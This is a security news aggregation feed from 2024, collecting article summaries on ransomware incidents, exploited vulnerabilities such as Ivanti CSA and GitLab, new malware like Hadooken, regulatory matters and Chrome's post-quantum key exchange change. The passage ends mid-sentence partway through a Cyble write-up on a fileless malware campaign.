Security News

by ComputerWeekly

The Port of Seattle released a statement Friday confirming that it was targeted by a ransomware attack. The attack occurred on August 24, with the Port (which also operates the Seattle-Tacoma International Airport) saying it had “experienced certain system outages indicating a possible cyberattack.” The Port is now describing this as “a ‘ransomware’ attack by […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Port of Seattle confirmed on Friday that the Rhysida ransomware group was behind the cyberattack that hit the agency in August. In August, a cyber attack hit the Port of Seattle, which also operates the Seattle-Tacoma International Airport, websites and phone systems were impacted. Media reported that the Port of Seattle, which also operates the […]

by Security Affairs

A recently fixed ""Windows MSHTML spoofing vulnerability"" tracked under CVE-2024-43461 is now marked as previously exploited after it was used in attacks by the Void Banshee APT hacking group. [...]

by BleepingComputer

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Mythical Beasts and Where to Find Them: Mapping the Global Spyware Market and its Threats to National Security and Human Rights   Dissecting Lumma Malware: Analyzing the Fake CAPTCHA and Obfuscation Techniques – Part 2   Predator Spyware […]

by Security Affairs

When we asked Betania Allo (Founder and Principal Consultant, BA Cyber Law & Policy) to share her perspective on the new UN Convention Against Cybercrime, she told us how it might align with existing cybersecurity agreements and regional differences in cyber law. “Generally speaking, while international and regional frameworks provide a general structure, local regulations must be adapted to the specific legal, cultural, and technological contexts of each country,” Betania said. “Together with investment in capacity building, it ensures that the regulations are practical and enforceable.” But when the convention must be integrated into national regulations in a localised way, how can we measure its success? How do you perceive the alignment between the new UN Cybercrime Convention and existing regulations, like the EU’s AI Act, in addressing AI-driven cyber threats? “Once ratified, the provisions of the Convention must be incorporated into the national legal framework. This involves drafting and enacting new laws or amending existing ones to align with the convention’s requirements. But what happens with existing legislation? “Regional regulations, like the European Union’s AI Act, play a crucial role in complementing and enhancing the effectiveness of international instruments like the UN Cybercrime Convention. The AI Act is significant because it categorises AI systems into different risk levels, with stringent regulations for high-risk applications like deepfakes and autonomous cyber-attacks. “This creates a robust legal framework that not only addresses AI-related threats but also sets a precedent for other regions and countries to follow. “I also think that the EU has done it again by being at the forefront in regulating AI and providing a model for others, encouraging harmonisation of standards and practices across borders. This helps prevent regulatory gaps that could be exploited by cybercriminals, ensuring a more unified approach to tackling AI-driven cyber threats globally. “The good news is that its provisions on AI-related crimes align with and support the goals of the UN Cybercrime Convention. By criminalising specific AI-driven activities, such as the non-consensual dissemination of intimate images through deepfakes, the AI Act strengthens the convention’s effectiveness at the local level. “This alignment between regional and international regulations ensures that there are comprehensive measures in place to protect individuals and societies from the malicious use of AI technologies.” How do we measure success, knowing that Member States will have to develop local regulations that reflect the goals of this Convention? “The success of international conventions and regional regulations depends on the ability of each individual state to develop local regulations that reflect the spirits of these frameworks. “Generally speaking, while international and regional frameworks provide a general structure, local regulations must be adapted to the specific legal, cultural, and technological contexts of each country. Together with investment in capacity building, it ensures that the regulations are practical and enforceable. “Now, given the cross-border nature of cyber threats, international cooperation is essential. States must work together, sharing information and best practices, to address cybercrime effectively. This alignment ensures that evolving cyber threats are effectively managed at both the national and international levels, protecting individuals and promoting a safer global digital environment. “States are encouraged to develop local regulations that embody the principles of these frameworks, fostering a cohesive and resilient response to the challenges of modern cybersecurity.” Digital evidence is the cornerstone of cybercrime investigations. Why is it so crucial and what does the Convention reveal about this? “The Convention represents a fundamental advancement in the global effort to address the complexities of cross-border digital evidence. It is particularly noteworthy for its attempts to create a cohesive and cooperative international framework that complements and enhances existing local and regional regulations. “One of the most important advances in the Convention is the establishment of comprehensive mechanisms for the mutual legal assistance (MLA) process in relation to cross-border digital evidence. Articles 28 to 30 discussed before are critical because they set out the procedures for obtaining and sharing digital evidence across national borders, ensuring that such processes are carried out in a manner consistent with international standards. “The inclusion of these articles reflects a recognition of the need for greater international cooperation in cybercrime investigations, where evidence often spans multiple jurisdictions. “Naturally, these advances are designed to complement and integrate with existing local and regional regulations. For instance, the European Union’s General Data Protection Regulation (GDPR) and the European Investigation Order (EIO) provide a robust framework for the protection of personal data and the sharing of evidence within the EU. The UN Convention builds on these principles by extending similar protections and cooperation mechanisms to a global scale. Upon ratification, the Convention’s provisions could enhance the effectiveness of these existing regulations by facilitating more streamlined and legally consistent cross-border evidence sharing. “Other regions with their own legal frameworks would benefit from the Convention’s standardised procedures for handling cross-border data requests. The Convention also emphasises the importance of capacity-building and technical assistance, particularly for developing countries, to ensure that all Member States can effectively participate in and benefit from these advanced mechanisms. “This focus on capacity-building is essential for bridging the gap between nations with varying levels of technological and legal infrastructure, fostering a more inclusive and effective global cybercrime response.” P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Veeam Backup & Replication RCE flaw may soon be leveraged by ransomware gangs (CVE-2024-40711) CVE-2024-40711, a critical vulnerability affecting Veeam Backup & Replication (VBR), could soon be exploited by attackers to steal enterprise data. Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, … More → The post Week in review: Veeam Backup & Replication RCE could soon be exploited, Microsoft fixes 4 0-days appeared first on Help Net Security.

by Help Net Security

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. U.S. CISA adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog Ivanti Cloud Service Appliance […]

by Security Affairs

Learn how Darktrace AI outsmarts impersonation tactics in cybersecurity. Discover cutting-edge security insights and how to keep yourself safe.

by Darktrace

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Ivanti Cloud Services Appliance OS Command Injection Vulnerability CVE-2024-8190 (CVSS score of 7.2) to its Known Exploited Vulnerabilities (KEV) catalog. This week, Ivanti warned that recently patched flaw […]

by Security Affairs

by Dark Reading

by Dark Reading

Ivanti warned that recently patched flaw CVE-2024-8190 in Cloud Service Appliance (CSA) is being actively exploited in the wild. Ivanti warned that a newly patched vulnerability, tracked as CVE-2024-8190 (CVSS score of 7.2), in its Cloud Service Appliance (CSA) is being actively exploited. “Following public disclosure, Ivanti has confirmed exploitation of this vulnerability in the […]

by Security Affairs

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are alerting the public of false claims that the U.S. voter registration data has been compromised in cyberattacks. [...]

by BleepingComputer

A malware campaign uses the unusual method of locking users in their browser''s kiosk mode to annoy them into entering their Google credentials, which are then stolen by information-stealing malware. [...]

by BleepingComputer

Ivanti has revealed that a newly patched security flaw in its Cloud Service Appliance (CSA) has come under active exploitation in the wild. The high-severity vulnerability in question is CVE-2024-8190 (CVSS score: 7.2), which allows remote code execution under certain circumstances. ""An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows

by The Hacker News

Plus: New evidence emerges about who may have helped 9/11 hijackers, UK police arrest a teen in connection with an attack on London’s transit system, and Poland’s spyware scandal enters a new phase.

by WIRED Security News

From durable laptops to noise-canceling headphones and smart alarms, here''s a list of must-have tech to keep you connected, focused, and prepared for whatever college throws your way.

by ITPro Today

In a recent interview with The Cyber Express on the show Security Pill, Manish Chachada, Co-Founder and COO of Cyble, provided key insights into the implications of MasterCard’s acquisition of Recorded Future. This marks a significant shift in the cyber threat intelligence market, particularly for financial institutions. While acknowledging the benefits of such acquisitions, Manish emphasized Cyble’s choice to remain independent for agility and innovation, enabling real-time decision-making and customization for clients. He highlighted how AI has shaped Cyble’s growth, setting them apart from competitors. Acquisitions, while strategic, often come with challenges, including shifts in priorities and innovation hurdles. Manish urged businesses to stay informed, adapt to changing market dynamics, and evaluate how these moves impact their operations. Cyble’s AI-driven approach to threat intelligence continues to play a crucial role in its differentiation from industry competitors, providing flexible and robust solutions tailored to emerging cybersecurity threats. This acquisition, like others in 2024, reflects the growing importance of cybersecurity within financial institutions and the broader business landscape. However, Cyble’s commitment to independence ensures it remains agile, helping clients navigate new challenges and changes in the market. Watch the Video Here

by The Cyber Express

Fortinet, a multinational cybersecurity firm and the world’s seventh largest retail IT company, has confirmed that it’s been hacked, according to reports. The news of this major breach at a company whose business model is built on keeping corporate networks safe is an ominous sign of where digital security is headed now. The company’s data […] The post Fortinet Data Breach: A Wake-Up Call for Cybersecurity Firms appeared first on ThreatMon Blog.

by ThreatMon

GitLab addressed multiple vulnerabilities impacting GitLab CE/EE, including a critical pipeline execution issue. GitLab released security patches for 17 vulnerabilities in GitLab CE (Community Edition) and EE (Enterprise Edition). One of these vulnerabilities is a critical pipeline execution flaw, tracked as CVE-2024-6678 (CVSS score of 9.9), that could allow an attacker to trigger a pipeline […]

by Security Affairs

Learn how internal phishing can compromise accounts swiftly & how Darktrace/Apps can prevent future attacks effectively.

by Darktrace

Darktrace highlights a handful of data theft incidents on shared cloud platforms, showing that cloud computing can be a vulnerable place for modern extortion.

by Darktrace

by The Record

by The Record

After months of regulatory discussions, Meta is pushing forward with its generative AI plans, leveraging public content from UK Facebook and Instagram users. The company is eager to resume AI training in the UK—though not without fresh oversight and transparency measures. The UK Information Commissioner’s Office (ICO) has been closely watching Meta’s efforts. In June, Meta paused its AI training plans after a request from the ICO. The company has since modified its approach, streamlining its objection form and extending the time frame for users to opt out. The move reflects the complex interplay between tech giants and data privacy regulators as AI models evolve. While Meta touts its transparent approach to AI, privacy concerns remain at the forefront. Meta''s Push for AI Training in the UK Meta’s latest statement shows the tech giant''s intent to build AI products that mirror British culture, idioms, and history. By incorporating public content shared by adult users on its platforms, Meta hopes to tailor its generative AI models for the UK market. These models won’t just serve everyday users—they’re designed to enhance AI products for businesses and institutions across the region. By using public posts, comments, and captions, Meta said, it intends to ensure that its AI better reflects the diversity of the UK. It’s not just the technology that has evolved, but the process behind it. Meta incorporated feedback from the ICO to make its operations more transparent. The company will now notify users via in-app alerts, providing an option to object to their data being used. Regulatory Approval Awaited Since pausing its AI training earlier this year, Meta has engaged in extensive discussions with the ICO. In response, the company has improved its user-facing transparency measures. Meta’s approach—while already more transparent than that of other industry counterparts, according to its June statement—now includes a simplified, easily accessible objection form. “We’ve incorporated feedback from the ICO to make our objection form even simpler, more prominent and easier to find,” Meta said, pledging to honor all objections previously submitted. This move aligns with Meta’s broader strategy to maintain compliance with the UK’s data protection framework while continuing to develop cutting-edge AI. But despite these updates, the ICO has yet to grant regulatory approval, signaling that the tech giant remains under the watchful eye of data protection authorities. Legitimate Interests: The Legal Foundation One of the core issues that emerged during Meta’s dialogue with the ICO was the legal basis for using UK user data. The company has opted to rely on ""Legitimate Interests"" under UK General Data Protection Regulation (GDPR) as the legal foundation for its AI data processing. Legitimate Interests allows organizations to use personal data without explicit user consent, provided that it meets a set of criteria. According to Meta, this legal pathway strikes the right balance between innovation and user rights, particularly when using publicly available data. It’s a common method for processing large-scale data while respecting individual privacy. Still, privacy activists have voiced concerns about this approach. They argue that the nature of AI models—trained on vast datasets—could undermine individual privacy, even if the data used is technically “public.” Broader Context: Meta’s AI Strategy in Europe Meta’s AI push in the UK mirrors its broader strategy in Europe. In a June statement, the company expressed frustration with regulatory delays across the continent, particularly in Ireland, where Meta has paused AI training for the European Union. “Our approach is more transparent and offers easier controls than many of our industry counterparts already training their models on similar publicly available information,” Meta said at the time. “We remain highly confident that our approach complies with European laws and regulations... This is a step backwards for European innovation, competition in AI development and further delays bringing the benefits of AI to people in Europe.” This tension between regulation and innovation is playing out across the tech industry. Google, OpenAI, and other major players have similarly faced challenges navigating Europe’s stringent data protection rules. On the same day that Meta announced its resumption of AI training in the UK, the Irish data regulator launched an investigation to determine Google''s compliance with a European privacy law. The Irish Data Protection Commission on Thursday said it is probing whether Google assessed privacy risks ahead of developing the Pathways Language Model. Google launched the PaLM multilingual generative AI model last year. The model can reason and code and is integrated with 25 Google products. Meta, however, frames its efforts as vital for European innovation. “Without including local information we’d only be able to offer people a second-rate experience,” the company explained. It stressed that AI built without European input would fall short in recognizing local languages, humor, and cultural references. The ICO''s Position The ICO’s stance on AI model training has been clear: transparency and user control must come first. Stephen Almond, the ICO’s Executive Director of Regulatory Risk, reiterated this after Meta’s latest statement. “Any organisation using its users’ information to train generative AI models needs to be transparent about how people’s data is being used,” Almond said. The ICO said that it had not granted formal approval for Meta’s resumed AI training and would continue to monitor the situation closely. Meta has responded by asserting that its latest adjustments, including more robust notifications and a streamlined objection process, address these regulatory concerns. The company remains optimistic about its prospects in the UK, believing it has struck the right balance between innovation and compliance. Looking Ahead As Meta resumes AI training in the UK, the move sets the stage for a larger conversation about AI governance, privacy, and the role of regulatory bodies. Will the UK’s cautious but progressive approach serve as a model for other countries navigating the delicate balance between AI development and privacy? For Meta, the stakes are high. If successful, its AI products could reshape how businesses and individuals interact with technology. If not, the company may face further regulatory roadblocks, both in the UK and across Europe. With AI shaping up to be the next frontier of technological innovation, how companies like Meta navigate these challenges will be crucial. And as regulators keep a close eye on these developments, the future of AI—and data privacy—remains uncertain.

by The Cyber Express

Satellite launching in 2026 aims to prove technology with applications in agriculture, climate science, navigation and secure communication.

by ITPro Today

by The Record

by The Record

In the wake of the devastating CrowdStrike meltdown earlier this year, Microsoft convened a meeting with leaders from the endpoint security business. Did anything useful come of it?

by ZDNET Security

by The Record

The incident is a reminder why organizations need to pay attention to how they store and secure data in SaaS and cloud environments.

by Dark Reading

Apple said there''s “too significant a risk” of exposing the anti-exploit work needed to fend off the very adversaries involved in the case. The post Apple Suddenly Drops NSO Group Spyware Lawsuit appeared first on SecurityWeek.

by SecurityWeek

Details have emerged about a now-patched security flaw impacting Apple''s Vision Pro mixed reality headset that, if successfully exploited, could allow malicious attackers to infer data entered on the device''s virtual keyboard. The attack, dubbed GAZEploit, has been assigned the CVE identifier CVE-2024-40865. ""A novel attack that can infer eye-related biometrics from the avatar image to

by The Hacker News

British authorities on Thursday announced the arrest of a 17-year-old male in connection with a cyber attack affecting Transport for London (TfL). ""The 17-year-old male was detained on suspicion of Computer Misuse Act offenses in relation to the attack, which was launched on TfL on 1 September,"" the U.K. National Crime Agency (NCA) said. The teenager, who''s from Walsall, is said to have been

by The Hacker News

Port of Seattle, the United States government agency overseeing Seattle''s seaport and airport, confirmed on Friday that the Rhysida ransomware operation was behind a cyberattack impacting its systems over the last three weeks. [...]

by BleepingComputer

Security providers and regulators attended the Windows Endpoint Security Ecosystem Summit earlier this week.

by SC Media

In this case study, a CISO helps a B2B marketing automation company straighten out its manual compliance process by automating it.

by Dark Reading

The FBI received some 69,000 cryptocurrency related complaints on the year.

by SC Media

Collection of 40,000+ Nuclei templates, Extracting Data from Targets, Using Nuclei for OSINT, and more...

by Hive Five

A new Linux malware called Hadooken targets Oracle WebLogic servers, it has been linked to several ransomware families. Aqua Security Nautilus researchers discovered a new Linux malware, called Hadooken, targeting Weblogic servers. The name comes from the attack “surge fist” in the Street Fighter series. Upon execution, the malware drops a Tsunami malware and deploys […]

by Security Affairs

by Dark Reading

The FBI and CISA are warning citizens of attempts to convince voters that US election infrastructure has been compromised. (It hasn''t been.)

by Dark Reading

by Dark Reading

by Dark Reading

Microsoft is revamping how anti-malware tools interact with the Windows kernel to avoid another CrowdStrike faulty update catastrophe.  The post Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel appeared first on SecurityWeek.

by SecurityWeek

As the 104th season of the National Football League kicks off, expect cyberattacks aimed at its customers, players, and arenas.

by Dark Reading

At Oracle''s CloudWorld 2024, the focus wasn''t on any one cloud but on the expanding nature of the cloud to support customer requirements.

by ITPro Today

​Transport for London (TfL) says that all staff (roughly 30,000 employees) must attend in-person appointments to verify their identities and reset passwords following a cybersecurity incident disclosed almost two weeks ago. [...]

by BleepingComputer

Even as cyber threats become increasingly sophisticated, the number one attack vector for unauthorized access remains phished credentials (Verizon DBIR, 2024). Solving this problem resolves over 80% of your corporate risk, and a solution is possible.  However, most tools available on the market today cannot offer a complete defense against this attack vector because they were architected to

by The Hacker News

Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims'' banking credentials. ""The mechanisms include using malformed ZIP files in combination with JSONPacker,"" Cleafy security researchers Michele Roviello and Alessandro Strino said. ""In addition,

by The Hacker News

Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks. The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who

by The Hacker News

A newly identified technique used by credential-stealing malware forces users to input their login credentials into their browsers, allowing attackers to harvest this sensitive data. This method, uncovered by security researchers on August 22, 2024, uses an AutoIt script, in conjunction with the Stealc malware, to target and compromise victims'' credential stores by exploiting browser … The post New AutoIt Malware Forces Users to Surrender Credentials in Kiosk Mode appeared first on CyberInsider.

by Cyber Insider

The FBI’s Internet Crime Complaint Center (IC3) has released an alarming update on Business Email Compromise (BEC) scams, revealing that these schemes have now led to over $55 billion in reported losses worldwide between October 2013 and December 2023. This marks a significant rise in BEC-related crimes, which continue to target businesses and individuals by … The post FBI Issues Warning as Business Email Compromise Losses Reach $55 Billion appeared first on CyberInsider.

by Cyber Insider

Microsoft has officially announced the deprecation of several legacy Digital Rights Management (DRM) services, which will affect users of Windows Media Player, Silverlight, and older Windows versions like Windows 7 and 8. The services are being phased out as part of Microsoft’s broader initiative to modernize its digital content protection infrastructure. This deprecation impacts various … The post Microsoft to Deprecate Legacy DRM for Media Player on Windows 7, 8 appeared first on CyberInsider.

by Cyber Insider

Kawasaki Motors Europe (KME) recently revealed it was the target of a ransomware attack that occurred at the start of the month. While the company has stated that the attack was not entirely successful, it resulted in a temporary isolation of their servers to prevent further damage. The ransomware group behind the attack has since … The post Kawasaki Motors Europe Hit by RansomHub Ransomware Attack appeared first on CyberInsider.

by Cyber Insider

Car manufacturer Ford Motor Company has filed a patent application for an in-vehicle advertisement presentation system based on information derived from...

by Malwarebytes Labs

by Mike Saunders, Principal Security Consultant     This blog is the thirteenth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of […]

by Red Siege Blog

by SC Media

A new Android malware called Trojan Ajina.Banker is targeting Central Asia – Discover how this malicious malware disguises…

by Hackread

In August, we recorded a total of 442 ransomware victims, the second-most all year.

by ThreatDown

Security pros called this GitLab patch an urgent one because an exploited CI/CD pipeline could lead to a serious supply chain compromise.

by SC Media

The federal indictment of two alleged members of the Terrorgram Collective, a far-right cell accused of inspiring “lone wolf” attacks, reveals the US is now using a “forgotten” legal strategy.

by WIRED Security News

The newest iPhone comes with a hardware-based security feature to better ensure user privacy.

by ZDNET Security

DNA testing giant 23andMe has agreed to pay $30 million to settle a lawsuit over a data breach that exposed the personal information of 6.4 million customers in 2023. [...]

by BleepingComputer

On Thursday, cybersecurity giant Fortinet disclosed a breach involving customer data.  In a statement posted online, Fortinet said an individual intruder accessed “a limited number of files” stored on a third-party shared cloud drive belonging to Fortinet, which included data belonging to “less than 0.3%” of its customers. The company said that the incident “did […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Lehigh Valley Health Network ’s (LVHN) hospital network has agreed to a $65 million settlement in a class action lawsuit related to a data breach. Lehigh Valley Health Network (LVHN) is a large hospital and healthcare system based in Pennsylvania, USA. It operates numerous hospitals, health centers, and outpatient facilities across the region, including the […]

by Security Affairs

Developing secure software is not a game. Or is it? Enter the futuristic world of The Helix Files to join the secretive Helix organization and choose your own adventure to help save humanity from AI-accelerated collapse—all while racing against the clock and maintaining maximum security. Before you jump in, here is your briefing to get you up to speed on the events that got us where we are today in 2035. The post The Helix Files: Choose Your Own Adventure appeared first on Invicti.

by Invicti

To prevent this, organizations should focus on developing secure hardware and firmware foundations, enabling them to manage, monitor, and remediate hardware and firmware security.

by Dark Reading

Ivanti confirmed on Friday that a high severity vulnerability in its Cloud Services Appliance (CSA) solution is now actively exploited in attacks. [...]

by BleepingComputer

Detection rules are the backbone ofmodern Security Operations Centers (SOCs), serving as the eyes and ears for threat detection and response. However, ensuring these rules function as intended can be challenging. Many SIEM systems lack advanced validation mechanisms, resulting in undetected threats and a false sense of security. In our research for the Blue Report 2024, we identified the most common issues affecting theeffectiveness of detection rules within SIEM systems. 

by Picus Security

Researchers at Palo Alto Networks’ Unit 42 warn that attackers are using refresh entries in HTTP response headers to automatically redirect users to phishing pages without user interaction.

by KnowBe4

Noteworthy stories that might have slipped under the radar: a possible Adobe Reader zero-day, researchers mistakenly hijack .mobi TLD, and an exploited WhatsApp View Once bypass. The post In Other News: Possible Adobe Reader Zero-Day, Hijacking Mobi TLD, WhatsApp View Once Exploit appeared first on SecurityWeek.

by SecurityWeek

Hackers are targeting Oracle WebLogic servers to infect them with a new Linux malware named ""Hadooken,"" which launches a cryptominer and a tool for distributed denial-of-service (DDoS) attacks. [...]

by BleepingComputer

It’s not just government organizations that need to worry about cyber espionage campaigns — the entire business world is also a target. Multipolarity has been a defining trend in geopolitics in recent years. Rivalries between the world’s great powers continue to test the limits of globalism, resulting in growing disruption to international supply chains and […] The post What can businesses learn from the rise of cyber espionage? appeared first on Security Intelligence.

by Security Intelligence

With the US election on the horizon, it’s a good time to explore the concept of social media weaponization and its use in asymmetrically manipulating public opinion through bots, automation, AI, and shady new tools in what Trustwave SpiderLabs has dubbed the Distributed Denial of Truth (DDoT).

by SpiderLabs Blog

A cyberattack that shut down some of the top casinos in Las Vegas last year quickly became one of the most riveting security stories of 2023: It was the first known case of native English-speaking hackers in the United States and Britain teaming up with ransomware gangs based in Russia. But that made-for-Hollywood narrative has eclipsed a far more hideous trend: Many of these young, Western cybercriminals are also members of fast-growing online groups that exist solely to bully, stalk, harass and extort vulnerable teens into physically harming themselves and others.

by Krebs on Security

Apple has released a patch for Vision Pro after researchers showed how an attacker can obtain passwords typed by looking at keys. The post Apple Patches Vision Pro Vulnerability to Prevent GAZEploit Attacks appeared first on SecurityWeek.

by SecurityWeek

Posted by David Adrian, David Benjamin, Bob Beck & Devon O''Brien, Chrome Team We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients. The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber. At the time, the NIST standardization process for Kyber had not yet finished. Since then, the Kyber algorithm has been standardized with minor technical changes and renamed to the Module Lattice Key Encapsulation Mechanism (ML-KEM). We have implemented ML-KEM in Google’s cryptography library, BoringSSL, which allows for it to be deployed and utilized by services that depend on this library. The changes to the final version of ML-KEM make it incompatible with the previously deployed version of Kyber. As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519. To handle this, we will be making the following changes in Chrome 1311: Chrome will switch from supporting Kyber to ML-KEM Chrome will offer a key share prediction for hybrid ML-KEM (codepoint 0x11EC) The PostQuantumKeyAgreementEnabled flag and enterprise policy will apply to both Kyber and ML-KEM Chrome will no longer support hybrid Kyber (codepoint 0x6399) Chrome will not support Kyber and ML-KEM at the same time. We made this decision for several reasons: Kyber was always experimental, so we think continuing to support it risks ossification on non-standard algorithms. Post-quantum cryptography is too big to be able to offer two post-quantum key share predictions at the same time. Server operators can temporarily support both algorithms at the same time to maintain post-quantum security with a broader set of clients, as they update over time. We do not want to regress any clients’ post-quantum security, so we are waiting until Chrome 131 to make this change so that server operators have a chance to update their implementations. Longer term, we hope to avoid the chicken-and-egg problem for post-quantum key share predictions through our emerging IETF draft for key share prediction. This allows servers to broadcast what algorithms they support in DNS, so that clients can predict a key share that a server is known to support. This avoids the risk of an extra round trip, which can be particularly costly when using large post-quantum algorithms. We’re excited to continue to improve security for Chrome users, against both current and future computers. Notes Chrome Canary, Dev, and Beta may see these changes prior to Chrome 131. ↩

by Google Security Blog

Kawasaki Motors Europe has announced that it''s recovering from a cyberattack that caused service disruptions as the RansomHub ransomware gang threatens to leak stolen data. [...]

by BleepingComputer

India has claimed a spot in the Tier-1 category in the latest Global Cybersecurity Index (GCI) 2024, released by the International Telecommunication Union (ITU). With a rank of 98.49, India is one of the 47 countries that has been adjudged as a leading nation which has demonstrated commitment to robust cybersecurity practices. The GCI conducts a comprehensive assessment of national cybersecurity preparedness annually. It evaluates countries across five key pillars: legal, technical, organizational, capacity development, and cooperation. In its fifth annual report, the GCI found India taking strong actionable cybersecurity measures in all these crucial areas. Legal Measures Boosts India''s Rank in Global Cybersecurity Index According to the GCI 2024 report, India excelled in the legal pillar, establishing a robust framework of laws and regulations to govern cybersecurity. The Information Technology Act (2000) and its amendments hold significant weight in this regard, outlining measures to combat cybercrime, protect critical infrastructure, and ensure data privacy. Additionally, the passage of the Digital Personal Data Protection Bill (2022) further strengthens India''s legal framework, providing enhanced safeguards for citizen data. [caption id=""attachment_89896"" align=""alignnone"" width=""1050""] Source: GCI 2024[/caption] Technical Prowess and Capacity Building India''s technical prowess also contributed to its Tier 1 placement. The country has witnessed a surge in initiatives promoting secure infrastructure and technology adoption. This includes the establishment of the Indian Computer Emergency Response Team (CERT-In), a national body dedicated to cyber incident response and threat mitigation. Additionally, various government programs promote capacity building through training and awareness initiatives across diverse sectors. The GCI report underscores the importance of international cooperation in the fight against cybercrime. India has actively participated in global efforts, fostering collaboration with international organizations and other nation-states. This includes participation in forums like the Budapest Convention on Cybercrime and joint cybersecurity exercises with partner countries. Ranking of Other Countries, Challenges As many as 47 countries out of 194 made it to the Tier 1 of the GCI report. Among the countries in the category, 12 received a perfect score of 100 including Korea, the U.K., Denmark, Italy, Finland and the United Arab Emirates. [caption id=""attachment_89897"" align=""alignnone"" width=""962""] Source: GCI 2024[/caption] Worrisome threats highlighted in the report included ransomware attacks targeting government services and other sectors, cyber breaches affecting core industries, costly system outages, and breaches of privacy for individuals and organizations. “Building trust in the digital world is paramount,"" said Doreen Bogdan-Martin, ITU Secretary-General. “The progress seen in the Global Cybersecurity Index is a sign that we must continue to focus efforts to ensure that everyone, everywhere can safely and securely manage cyberthreats in today''s increasingly complex digital landscape."" Most countries are either “establishing"" (Tier 3) or “evolving"" (Tier 4) in terms of cybersecurity. The 105 countries in these tiers have largely expanded digital services and connectivity but still need to integrate cybersecurity measures. A ""cyber capacity gap"" – characterized by limitations in skills, staffing, equipment and funding – was evident in many countries and across all regional groups, according to the report. Legal measures are the strongest cybersecurity pillar for most countries: 177 countries have at least one regulation on either personal data protection, privacy protection, or breach notification in force or in progress, it added. Challenges Remain While India''s ascension to Tier 1 is a cause for celebration, challenges still remain. The ever-evolving cyber threat landscape demands continuous vigilance and adaptation. Bridging the digital divide and ensuring equitable access to cybersecurity resources across all segments of society is crucial. Additionally, fostering a culture of cyber hygiene and raising public awareness about online threats remain key priorities. India''s placement in Tier 1 presents an opportunity to build upon its achievements. Continuous improvement in legal frameworks, investment in cutting-edge technology, and fostering a collaborative environment both within and across borders will be critical for maintaining its leadership position. By prioritizing cybersecurity, India can pave the way for a more secure and resilient digital future for its citizens and businesses.

by The Cyber Express

The recently observed Hadooken malware targeting Oracle WebLogic applications is linked to multiple ransomware families. The post New ‘Hadooken’ Linux Malware Targets WebLogic Servers appeared first on SecurityWeek.

by SecurityWeek

Cybersecurity researchers have uncovered a new malware campaign targeting Linux environments to conduct illicit cryptocurrency mining and deliver botnet malware. The activity, which specifically singles out the Oracle Weblogic server, is designed to deliver a malware strain dubbed Hadooken, according to cloud security firm Aqua. ""When Hadooken is executed, it drops a Tsunami malware and deploys

by The Hacker News

A joint report from the Committees on China and Homeland Security warns of the security risks posed by Chinese cranes in US ports. The post House Report Shows Chinese Cranes a Security Risk to US Ports appeared first on SecurityWeek.

by SecurityWeek

In this blog, we delve into the top three concealed security expenses associated with low-code mobile app development and explore strategies to mitigate them. The post Unlocking the Hidden Costs of Mobile App Security in Low-Code Development appeared first on Zimperium.

by Zimperium

The designation of UK data centers as Critical National Infrastructure strengthens cyber defenses, but a proposed £3.75B data center on protected Green Belt land sparks debate. The post UK Data Centers Gain Critical Infrastructure Status, Raising Green Belt Controversy appeared first on SecurityWeek.

by SecurityWeek

Cyble Research and Intelligence Labs (CRIL) has recently uncovered a sophisticated cyber campaign aimed at attendees of the upcoming US-Taiwan Defense Industry Conference. This stealthy fileless attack utilizes a malicious file to carry out an in-memory attack, evading traditional detection methods while exfiltrating sensitive data from targeted systems. The fileless campaign detected by CRIL involves a malicious ZIP archive disguised as a legitimate registration form for the conference. This deceptive tactic is designed to trick users into executing a harmful LNK file that appears to be a PDF document. When executed, the LNK file initiates a series of covert actions to establish persistence and execute further malicious activities. Overview of the Stealthy Fileless Attack Campaign [caption id=""attachment_89888"" align=""aligncenter"" width=""513""] Infection Chain (Source: Cyble)[/caption] Upon execution of the LNK file, it extracts a lure PDF and a base64-encoded executable. This executable, protected by the .NET Confuser tool, is placed in the startup folder to ensure it runs every time the system reboots. Once the executable is activated, it downloads additional malicious content, including an encrypted DLL file from a remote server. This DLL is then decrypted and loaded directly into memory, avoiding detection by conventional security tools. The campaign’s stealthiness is further enhanced by the second-stage loader, which dynamically compiles and executes C# code entirely in memory. This technique, known as in-memory execution, prevents the creation of traceable files on disk, making detection significantly more challenging. Technical Analysis CRIL''s investigation revealed that the initial infection vector remains unclear, though the lure document suggests that spam emails might be used to distribute the malicious archive. The ZIP file, named ""registration_form.pdf.zip,"" contains an LNK file with a dual extension (.pdf.lnk), misleading users into believing it is a harmless PDF document. [caption id=""attachment_89890"" align=""alignnone"" width=""811""] Contents of registration_form.pdf.lnk (Source: Cyble)[/caption] When the LNK file is opened, it executes a series of commands in the background. It decodes embedded base64 content, saving the lure PDF and executable to the system. The executable is then placed in the startup folder to ensure persistence. Following this, the lure 